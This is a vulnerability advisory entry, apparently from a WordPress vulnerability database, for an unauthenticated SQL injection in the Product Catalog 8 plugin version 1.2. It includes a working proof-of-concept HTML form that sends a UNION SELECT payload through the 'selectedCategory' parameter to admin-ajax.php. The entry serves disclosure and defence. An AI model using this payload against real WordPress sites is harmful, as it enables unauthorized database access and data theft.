WordPress Plugin Vulnerabilities
Product Catalog 8 1.2 - Unauthenticated SQL Injection
Description
$_POST[ ‘selectedCategory’ ] is not escaped. UpdateCategoryList() is accessible for any user.
Proof of Concept
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php"> <input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1"> <input type="text" name="action" value="UpdateCategoryList"> <input type="submit" value="Send"> </form>
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
Miscellaneous
Submitter
Lenon Leite
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2016-11-28 (about 7 years ago)
Added
2016-12-06 (about 7 years ago)
Last Updated
2019-11-01 (about 4 years ago)